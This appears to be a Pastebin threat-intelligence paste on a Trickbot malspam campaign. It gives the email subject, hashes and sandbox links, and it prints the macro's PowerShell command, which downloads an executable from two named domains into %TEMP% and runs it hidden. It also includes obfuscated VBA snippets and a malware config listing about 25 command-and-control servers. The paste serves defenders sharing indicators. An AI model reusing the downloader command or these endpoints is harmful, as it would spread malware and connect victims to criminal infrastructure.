Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- found by @neonprimetime security
- #trickbot
- same as this article https://myonlinesecurity.co.uk/yet-another-fake-companies-house-fw-company-complaint-3290749822-delivers-trickbot/
- https://www.joesandbox.com/analysis/61724/0/html
- Subject: FW: Company Complaint #xxxxxx
- Attachment: xxxxxx.doc
- 507542d2ebb235941b3fbbb72f11950f
- https://www.hybrid-analysis.com/sample/1fe32e3850e1ddd03e0415b2989d6f2751e276231d4bcded2c2d43f88057416c?environmentId=120
- dropped
- logo.exe
- 8CD3BA008C93327369B3D50341DB8F74
- https://www.hybrid-analysis.com/sample/9d98f1ce5d7abb69a84d7224f44837f090f95d811c12d45173b529bf77bb3d9c?environmentId=100
- ------------
- downloader commands run
- ------------
- cmd.exe /c PowerShell "'PowerShell ""function Zupwjwbz1([String] $jdknrwstldt){(New-Object System.Net.WebClient).DownloadFile($jdknrwstldt,''%TEMP%\mlodfhqs_w.exe'');Start-Process ''%TEMP%\mlodfhqs_w.exe'';}try{Zupwjwbz1(''http://carasaan.com/logo.bin'')}catch{Zupwjwbz1(''http://tvboxaddons.com/logo.bin'')}'"" | Out-File -encoding ASCII -FilePath %TEMP%\Sg_ho1.bat;Start-Process '%TEMP%\Sg_ho1.bat' -WindowStyle Hidden"
- ------------
- interesting macro code
- ------------
- Function henderss()
- henderss = wwwpasswd.yb121212
- End Function
- Function tester198()
- tester198 = wwwpasswd.chewlang
- End Function
- Sub oodwin1234(kimpickle)
- tataskelt = "Run"
- embrocate = 0
- azinepli = True
- diecasts = 52 - 72
- CallByName kimpickle, tataskelt, VbMethod, vogotave.ympmeoha, embrocate, azinepli
- diecasts = 91 - 60 * diecast
- diecasts = 70 + 6
- diecasts = 3 + 72 - diecasts - 73 - diecast
- End Sub
- --------------------
- interesting in memory strings
- --------------------
- 0x2e208c (1736): <mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs><srv>109.86.227.152:443</srv><srv>185.129.78.167:443</srv><srv>190.4.189.129:443</srv><srv>103.228.142.14:443</srv><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>80.53.57.146:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>185.42.192.194:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>82.146.59.174:443</srv><srv>82.146.58.44:443</srv><srv>82.146.42.89:443</srv><srv>82.202.221.207:443</srv><srv>185.146.156.38:443</srv><srv>195.161.114.57:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>
- 0x2f3ba0 (26): 208.75.117.70
- 0x2f4bb0 (91): https://208.75.117.70:449/ser0530/[REDACTED INFO]/5/spk/
- 0x40004d (29): !This is a PE executable
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement